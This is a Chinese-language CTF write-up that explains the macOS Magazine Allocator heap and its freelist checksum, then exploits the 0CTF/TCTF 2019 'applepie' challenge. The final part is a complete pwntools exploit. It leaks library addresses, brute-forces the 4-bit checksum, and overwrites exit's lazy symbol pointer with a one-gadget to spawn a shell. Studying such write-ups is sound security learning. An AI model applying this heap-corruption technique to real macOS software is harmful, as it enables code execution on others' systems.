分享一下之前总结的一些MacOS系统的堆介绍及利用思路。
0CTF / TCTF2019比赛时出了一道MacOS下的堆利用题目,这里以该题为背景介绍MacOS下的堆利用攻击。前面主要详细介绍下MacOS系统的堆,如果想看利用可跳到后面的applepie exp编写
介绍章节。
原文链接为: https://gloxec.github.io
MacOS下的堆介绍
MacOS高版本系统使用Magazine Allocator进行堆分配,低版本使用Scalable Allocator,详细结构这里不做介绍,它在分配时按照申请大小将堆分为三类tiny,small,large
其中tiny&small用一个叫做 **Quantum ( Q )**的单位管理
- tiny (Q = 16) ( tiny < 1009B )
- small (Q = 512) ( 1008B < small < 127KB )
- large ( 127KB < large )
每个magazine有个cache区域可以用来快速分配释放堆
堆的元数据(metadata)
MacOS的堆分配方式和其他系统不同,没有采用Linked List
方式的分配,堆的前后并没有带堆的元数据,而是将元数据存放在了其他地方,并且做了一系列措施方式防止堆溢出修改元数据。
每个进程包含3个区域,分别为tiny rack, small rack, large allocations
tiny rack | small rack | large allocations |
---|---|---|
magazine | magazine | |
magazine | magazine | |
magazine | magazine | |
… | … | |
magazine | magazine |
每个区域包含了多个活动可变的magazine区域
magazine中有n多个"Region"
这个叫"Region"的区域大小在tiny rack和small rack中是不同的,
“Region” in Tiny rack = 1MB
“Region” in Small rack = 8MB
tiny rack{
magazine 1 {
Region 1 {}
Region 2 {}
...
Region n {}
}
magazine 2 {}
...
magazine 3 {}
}
small rack{
...
magazine n {}
...
}
"Region"中包含三样东西,一个是以Q为单位的内存block, 还有个是负责将各个"Region"关联起来的trailer另外一个就是记录chunk信息的metadata
tiny Region {
Q(1Q = 16) * 64520个
region_trailer_t trailer
metadata[64520/sizeof(uint32_t)] {
bitmaps[0]: uint32_t header = 描述哪个block是起始chunk
bitmaps[1]: uint32_t inuse = 描述chunk状态(busy/free)
}
}
Small Region {
Q(1Q = 512) * 16320个
region_trailer_t trailer
metadata[16320] {
bitmaps[0]: uint16_t msize = 最高一位描述chunk状态(busy/free), 其余位描述chunk的Q值(Q值代表与下一个chunk相差多少个Q)
}
}
large allocations保存在cache中,直接记录地址和大小,除非是分割严重,否则一般不会被unmmap
large {
address
size
did_madvise_reusable
}
堆的释放 - chunk本身的变化
tiny堆:
tiny堆在释放时,将该chunk挂在freelist上,这里和Linux类似
比较有意思的一点是,tiny堆在释放时,会在chunk上写入元数据,我们值得关心的就是这一点
# -----------------------------------------------
# AAAAA....
#
# ...AAA...
# .....AAAA
# -----------------------------------------------
# |
# | after free
# |
# ↓
# -----------------------------------------------
# checksum(prev_pointer) | checksum(next_pointer)
# size | ...
# ...
# | size
# -----------------------------------------------
这里有两个pointer和Linux上chunk的头极其相似,同样的,它们的作用也一样,在freelist上获取chunk时将会用这个pointer来进行链表的操作,还有chunk在free时,会进行合并检查,然后用这两个pointer进行unlink操作。
但是这里如果按照Linux的方式去攻击堆时,就会发现这里的checksum会阻止堆的元数据被溢出修改。后面会大致介绍这里的checksum
关于tiny堆释放时的需要注意的另外一个点:
a1 = malloc(496)
a2 = malloc(496)
a3 = malloc(496)
free(a1)
free(a3)
#这里会发现a1, a3会的prev_pointer & next_pointer会正确的关联起来
free(a2)
#当a2也free之后,会发现a2, a3的头部被清空,a1头部的size却是三者之和,并且移动到small堆中
small堆
small堆与tiny堆不同,释放后会先移动到cache中,等到下一个small堆被free时,当前的才会被移动到freelist中
堆的释放 - chunk元数据(metadata)的变化
mag_free_list
这里便是要讲上文提到的freelist,mag_free_list
是个负责存放地址的列表,一共包含32个元素,各个元素处储存着已经free的对应Q值的chunk地址,前31个分别是从1Q~31Q的chunk freelist,第32个存放比31Q还要大的chunk freelist。
当新的chunk被free时,将按照chunk的大小,存放在对应Q值的freelist上,并按照双向链表设置好checksum(prev_pointer), checksum(next_pointer) {参照Linux的freelist}
mag_free_bit_map
这个则如名字所示,按位来标记Q(n)是否具有freelist
堆的释放 - checksum
程序在运行时,都会随机生成一个cookie,这个cookie会pointer进行下面的计算生成一个checksum, 然后将(checksum << 56 ) | (pointer >> 4)运算后将checksum保存在高位上,以便检测堆的元数据是否被溢出破坏
static MALLOC_INLINE uintptr_t
free_list_checksum_ptr(rack_t *rack, void *ptr)
{
uintptr_t p = (uintptr_t)ptr;
return (p >> NYBBLE) | ((free_list_gen_checksum(p ^ rack->cookie) & (uintptr_t)0xF) << ANTI_NYBBLE); // compiles to rotate instruction
}
static MALLOC_INLINE void *
free_list_unchecksum_ptr(rack_t *rack, inplace_union *ptr)
{
inplace_union p;
uintptr_t t = ptr->u;
t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction
p.u = t & ~(uintptr_t)0xF;
if ((t ^ free_list_gen_checksum(p.u ^ rack->cookie)) & (uintptr_t)0xF) {
free_list_checksum_botch(rack, ptr, (void *)ptr->u);
__builtin_trap();
}
return p.p;
}
static MALLOC_INLINE uintptr_t
free_list_gen_checksum(uintptr_t ptr)
{
uint8_t chk;
chk = (unsigned char)(ptr >> 0);
chk += (unsigned char)(ptr >> 8);
chk += (unsigned char)(ptr >> 16);
chk += (unsigned char)(ptr >> 24);
#if __LP64__
chk += (unsigned char)(ptr >> 32);
chk += (unsigned char)(ptr >> 40);
chk += (unsigned char)(ptr >> 48);
chk += (unsigned char)(ptr >> 56);
#endif
return chk;
}
magazine_t
这个则包含了上述介绍过的各种数据,比如chunk cache, 以及mag_free_bit_map, mag_free_list, 以及最后一个被使用的region, 以及所有region的链表
struct magazine_t {
...
void *mag_last_free;
unsigned[8] mag_bitmap;
free_list_t*[256] mag_free_list;
region_t mag_last_region;
region_trailer_t *firstNode, *lastNode;
...
}
堆的申请
整个申请流程是首先从cache中寻找是否有对应的堆,如果没有接着从freelist中寻找,没找到再从region中去申请
题目攻击思路
首先题目保护全开,具有PIE,再分析程序流程。
程序整个流程就是以下面的结构体进行堆数据操作。
struct mem {
int StyleTableIndex
int ShapeTableIndex
int Time
int NameSize
char *NameMem
}
- 溢出
发现在update()更新mem时,可以随意设定当前mem->nameSize的大小,导致修改name时,可溢出修改name后的下一块mem的数据。
但是修改的size发现做了限制,导致数据溢出最大只能修改到mem结构的前三项
mem->StyleTableIndex
mem->ShapeTableIndex
mem->Time
- leak
在show()显示时,可以用StyleTable[offset/8]来leak数据
因为有PIE的存在,程序每次运行堆栈地址都会随机,所以整个利用思路就是先leak libsystem_c.dylib的地址,接着利用heap操作产生的漏洞去将包含的execv(‘/bin/sh’)代码运行地址写入可以劫持到程序流程的地方。
利用MacOS堆的特性leak libsystem_c.dylib
查看程序运行时的vmmap,可以看到程序下方有个Malloc metadata的region,这里开头存放的就是DefaultZone
我们可以看下libmalloc的源代码
typedef struct _malloc_zone_t {
/* Only zone implementors should depend on the layout of this structure;
Regular callers should use the access functions below */
void *reserved1; /* RESERVED FOR CFAllocator DO NOT USE */
void *reserved2; /* RESERVED FOR CFAllocator DO NOT USE */
size_t (* MALLOC_ZONE_FN_PTR(size))(struct _malloc_zone_t *zone, const void *ptr); /* returns the size of a block or 0 if not in this zone; must be fast, especially for negative answers */
void *(* MALLOC_ZONE_FN_PTR(malloc))(struct _malloc_zone_t *zone, size_t size);
void *(* MALLOC_ZONE_FN_PTR(calloc))(struct _malloc_zone_t *zone, size_t num_items, size_t size); /* same as malloc, but block returned is set to zero */
void *(* MALLOC_ZONE_FN_PTR(valloc))(struct _malloc_zone_t *zone, size_t size); /* same as malloc, but block returned is set to zero and is guaranteed to be page aligned */
void (* MALLOC_ZONE_FN_PTR(free))(struct _malloc_zone_t *zone, void *ptr);
void *(* MALLOC_ZONE_FN_PTR(realloc))(struct _malloc_zone_t *zone, void *ptr, size_t size);
void (* MALLOC_ZONE_FN_PTR(destroy))(struct _malloc_zone_t *zone); /* zone is destroyed and all memory reclaimed */
const char *zone_name;
/* Optional batch callbacks; these may be NULL */
unsigned (* MALLOC_ZONE_FN_PTR(batch_malloc))(struct _malloc_zone_t *zone, size_t size, void **results, unsigned num_requested); /* given a size, returns pointers capable of holding that size; returns the number of pointers allocated (maybe 0 or less than num_requested) */
void (* MALLOC_ZONE_FN_PTR(batch_free))(struct _malloc_zone_t *zone, void **to_be_freed, unsigned num_to_be_freed); /* frees all the pointers in to_be_freed; note that to_be_freed may be overwritten during the process */
struct malloc_introspection_t * MALLOC_INTROSPECT_TBL_PTR(introspect);
unsigned version;
/* aligned memory allocation. The callback may be NULL. Present in version >= 5. */
void *(* MALLOC_ZONE_FN_PTR(memalign))(struct _malloc_zone_t *zone, size_t alignment, size_t size);
/* free a pointer known to be in zone and known to have the given size. The callback may be NULL. Present in version >= 6.*/
void (* MALLOC_ZONE_FN_PTR(free_definite_size))(struct _malloc_zone_t *zone, void *ptr, size_t size);
/* Empty out caches in the face of memory pressure. The callback may be NULL. Present in version >= 8. */
size_t (* MALLOC_ZONE_FN_PTR(pressure_relief))(struct _malloc_zone_t *zone, size_t goal);
/*
* Checks whether an address might belong to the zone. May be NULL. Present in version >= 10.
* False positives are allowed (e.g. the pointer was freed, or it's in zone space that has
* not yet been allocated. False negatives are not allowed.
*/
boolean_t (* MALLOC_ZONE_FN_PTR(claimed_address))(struct _malloc_zone_t *zone, void *ptr);
} malloc_zone_t;
值得我们仔细关注的是这里的
struct malloc_introspection_t * MALLOC_INTROSPECT_TBL_PTR(introspect);
继续查看源代码
typedef struct malloc_introspection_t {
kern_return_t (* MALLOC_INTROSPECT_FN_PTR(enumerator))(task_t task, void *, unsigned type_mask, vm_address_t zone_address, memory_reader_t reader, vm_range_recorder_t recorder); /* enumerates all the malloc pointers in use */
size_t (* MALLOC_INTROSPECT_FN_PTR(good_size))(malloc_zone_t *zone, size_t size);
...
}
用之前介绍过的堆资料,可以知道
所以DefaultZone->introspect->enumerator这里储存了enumerator对应的函数szone_ptr_in_use_enumerator
的地址
libsystem_malloc.dylib地址
所以
libsystem_malloc.dylib的地址 = leak出的szone_ptr_in_use_enumerator地址 - sznoe偏移量(0x0000000000013D68)
libsystem_c.dylib地址
这里有个很有趣的现象,就是MacOS的PIE会保证程序每次运行时都会随机堆栈以及加载地址,但是引入的动态库地址不会产生变化,似乎只会在开机时变化。
所以可以看下vmmap,确定下libsystem_c.dylib与libsystem_malloc.dylib加载地址,得到偏移量。
libsystem_c.dylib = libsystem_malloc.dylib - 偏移量(0x161000)
OneGadget RCE
分析了libsystem_c.dylib,发现了与Linux libc中同样的execv(‘/bin/sh’)代码片段
onegadget rce = libsystem_c.dylib + 0x0000000000025D94
劫持程序流 - 前置
这里利用MachO的Lazy Bind机制,复写libsystem_c.dylib的la_symbol_ptr表中的函数存放地址(不写原程序的原因是无法leak原程序加载地址)
查看一周发现最优的选择为exit_la_symbol_ptr
我们可以在add()函数阶段输入不被认可的Size,可让程序执行exit()进而执行我们写入的地址。
这里发现libsystem_c.dylib的TEXT和DATA region地址相差较大,不像原程序紧挨在一起,所以这里还需要再leak一次libsystem_c.dylibd的DATA region地址。
libsystem_c.dylib DATA
分析原程序时发现在.got
内有个FILE **__stdinp_ptr
可以看到开头的_p指向了某块内存的地址,这样就可以利用这个来完成leak DATA地址,这里buffer与DATA起始地址的偏移量分析下就可以得到
libsystem_c_DATA = libsystem_c_stdinptr - 0x4110
typedef struct __sFILE {
unsigned char *_p; /* current position in (some) buffer */
int _r; /* read space left for getc() */
int _w; /* write space left for putc() */
short _flags; /* flags, below; this FILE is free if 0 */
short _file; /* fileno, if Unix descriptor, else -1 */
struct __sbuf _bf; /* the buffer (at least 1 byte, if !NULL) */
int _lbfsize; /* 0 or -_bf._size, for inline putc */
/* operations */
void *_cookie; /* cookie passed to io functions */
int (*_close)(void *);
int (*_read) (void *, char *, int);
fpos_t (*_seek) (void *, fpos_t, int);
int (*_write)(void *, const char *, int);
/* separate buffer for long sequences of ungetc() */
struct __sbuf _ub; /* ungetc buffer */
struct __sFILEX *_extra; /* additions to FILE to not break ABI */
int _ur; /* saved _r when _r is counting ungetc data */
/* tricks to meet minimum requirements even when malloc() fails */
unsigned char _ubuf[3]; /* guarantee an ungetc() buffer */
unsigned char _nbuf[1]; /* guarantee a getc() buffer */
/* separate buffer for fgetln() when line crosses buffer boundary */
struct __sbuf _lb; /* buffer for fgetln() */
/* Unix stdio files get aligned to block boundaries on fseek() */
int _blksize; /* stat.st_blksize (may be != _bf._size) */
fpos_t _offset; /* current lseek offset (see WARNING) */
} FILE;
劫持程序流 - 核心
根据前面堆的申请介绍,我们可以构造一些tiny堆,让再次申请堆时保证从freelist上获取,然后完成tiny_malloc_from_free_list(),使内部的unlink操作完成next->previous = ptr->previous
任意数据写任意地址的操作
但是这里有个问题,就是在unlink前,会有个unchecksum的检查,因为程序每次运行时,都会对当前的zone生成随机的cookie,导致这里无法绕过去
next = free_list_unchecksum_ptr(rack, &ptr->next);
free_list_gen_checksum(uintptr_t ptr)
{
uint8_t chk;
chk = (unsigned char)(ptr >> 0);
chk += (unsigned char)(ptr >> 8);
chk += (unsigned char)(ptr >> 16);
chk += (unsigned char)(ptr >> 24);
#if __LP64__
chk += (unsigned char)(ptr >> 32);
chk += (unsigned char)(ptr >> 40);
chk += (unsigned char)(ptr >> 48);
chk += (unsigned char)(ptr >> 56);
#endif
return chk;
}
static MALLOC_INLINE uintptr_t free_list_checksum_ptr(rack_t *rack, void *ptr)
{
uintptr_t p = (uintptr_t)ptr;
return (p >> NYBBLE) | ((free_list_gen_checksum(p ^ rack->cookie) & (uintptr_t)0xF) << ANTI_NYBBLE); // compiles to rotate instruction
}
但万幸的是MacOS在对生成的cookie和pointer进行checksum后,只使用了4个有效位来保存checksum值,所以可以设定个checksum进行爆破,让程序生成的cookie在与我们的pointer在checksum后恰好等于我们自己设定的值。
value = p64(((libsystem_c_exit_la_symbol_ptr >> 4) | int(checksum, 16)))
getshell
下面是完整的exp
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
#import monkeyhex
from binascii import *
import socket
import sys
def main(checksum, localFlag):
if localFlag == 1:
p = process('./applepie')
elif localFlag == 2:
p = remote('127.0.0.1', 10007)
elif localFlag == 3:
p = remote('111.186.63.147', 6666)
# context.log_level = 'debug'
context.terminal = ['tmux', 'split', '-h']
def add(style,shape,size,name):
p.recvuntil('Choice: ')
p.sendline('1')
p.recvuntil(':')
p.sendline(str(style))
p.recvuntil(':')
p.sendline(str(shape))
p.recvuntil(':')
p.sendline(str(size))
p.recvuntil(':')
p.sendline(name)
def show(id):
p.recvuntil('Choice:' )
p.sendline('2')
p.recvuntil(':')
p.sendline(str(id))
def update(id,style,shape,size,name):
p.recvuntil('Choice: ')
p.sendline('3')
p.recvuntil(':')
p.sendline(str(id))
p.recvuntil(':')
p.sendline(str(style))
p.recvuntil(':')
p.sendline(str(shape))
p.recvuntil('Size: ')
p.sendline(str(size))
p.recvuntil(':')
p.sendline(name)
def free(id):
p.recvuntil('Choice:')
p.sendline('4')
p.recvuntil(':')
p.sendline(str(id))
id0 = add(1, 1, 0x40, 'aaa')
id1 = add(1, 1, 0x40, 'aaa')
# 溢出修改styleTable数组的index,完成leak Default Zone struct的introspect保存的enumerator,可以用来leak libsystem_malloc.dylib
# libsystem_malloc.dylib`szone_ptr_in_use_enumerator:
# 0x7fff68161d68 <+0>: push rbp
# 0x7fff68161d69 <+1>: mov rbp, rsp
update(0, 1, 1, 0x50, 'a'*0x40 + p64(0x3fc0/8))
show(1)
p.recvuntil('Style: ')
szone_ptr_in_use_enumerator = u64(p.recvuntil('\n')[:-1].ljust(8, '\x00'))
log.info_once('szone_ptr_in_use_enumerator = ' + hex(szone_ptr_in_use_enumerator))
# szone_ptr_in_use_enumerator函数在libsystem_malloc.dylib中的地址0x0000000000013D68
libsystem_malloc_baseImage = szone_ptr_in_use_enumerator - 0x0000000000013D68
# Mac PIE的特殊性,程序本身每次运行全随机化,但动态库只有在开机时才会随机一次,此后位置都为固定
libsystem_c_baseImage = libsystem_malloc_baseImage - 0x161000
onegadget_rce = libsystem_c_baseImage + 0x0000000000025D94
# libsystem_c_exit_la_symbol_ptr = libsystem_c_baseImage + 0x8a0b0
log.info_once('libsystem_malloc.dylib = ' + hex(libsystem_malloc_baseImage))
log.info_once('libsystem_c.dylib = ' + hex(libsystem_c_baseImage))
log.info_once('libsystem_c.dylib: onegadget rce = ' + hex(onegadget_rce))
# log.info('libsystem_c.dylib: exit->la_symbol_ptr = ' + hex(libsystem_c_exit_la_symbol_ptr))
# 发现libsyste_c.dylib等动态库DATA与TEXT段分离较远(vmmap),所以先leak libsystem_c.dylib的DATA段
update(0, 1, 1, 0x50, 'a'*0x40 + p64(0xffffffffffffff78/8))
show(1)
p.recvuntil('Style: ')
libsystem_c_stdinptr = u64(p.recvuntil('\n')[:-1].ljust(8, '\x00'))
log.info_once('FILE *stdinp->p: ' + hex(libsystem_c_stdinptr))
libsystem_c_DATA = libsystem_c_stdinptr - 0x4110
log.info_once('libsystem_c.dylib: DATA seg = ' + hex(libsystem_c_DATA))
libsystem_c_exit_la_symbol_ptr = libsystem_c_DATA + 0xb0
log.info_once('libsystem_c.dylib: exit->la_symbol_ptr = ' + hex(libsystem_c_exit_la_symbol_ptr))
# 接着步骤为
id2 = add(1, 1, 0x40, 'aaa')
id3 = add(1, 1, 0x40, 'aaa') # free
id4 = add(1, 1, 0x40, 'aaa') # -----> 更改这个堆,溢出修改到下一个free块id5
id5 = add(1, 1, 0x40, 'aaa') # free
id6 = add(1, 1, 0x40, 'aaa')
id7 = add(1, 1, 0x40, 'aaa') # free
id8 = add(1, 1, 0x40, 'aaa')
# 释放id3,将其挂在freelist上
free(3)
free(5)
free(7)
# 更新块id4时,溢出修改前面释放的id5块上的元数据头
# -----------------------------
# prev_pointer | next_pointer
# size | ...
# ...
# | size
# -----------------------------
#
# 然后下次malloc时,会从freelist上获取之前free的id7, 再次malloc即可拿到id5
value = p64(((libsystem_c_exit_la_symbol_ptr >> 4) | int(checksum, 16)))
log.info_once('after checksum(ptr): ' + hex(u64(value)))
id7 = add(1, 1, 0x40, 'aaa')
update(4, 1, 1, 0x50, 'a'*0x40 + p64(onegadget_rce) + value)
# malloc申请内存,完成unlink操作, 将onegadget_rce写入libsystem_c_exit_la_symbol_ptr
p.recvuntil('Choice: ')
p.recvuntil('Choice: ')
p.sendline('1') # add id 5
try:
res = p.recv() # recvice 'Error'
if res.find('malloc') > 0:
log.failure('error checksum: ' + res)
return
else:
log.success('!!! currect checksum(' + hex(libsystem_c_exit_la_symbol_ptr) + '): ' + hex(u64(value)))
p.sendline('1') # Style
p.recvuntil('Choice: ')
p.sendline('1') # Shape
p.recvuntil('Size: ')
p.sendline('9999') # 输入错误Size让程序去执行exit()流程
p.recv() # 'Error'
p.sendline('uname')
res = p.recvuntil('Darwin')
log.info(res)
except:
return
p.interactive() # 这里getshell后就可以退出了
if res.find('Darwin') >= 0:
sys.exit()
for i in range(0x00, 0x23):
checksum = '0x'+'{:016x}'.format(0x23<<56)
main(checksum, 1)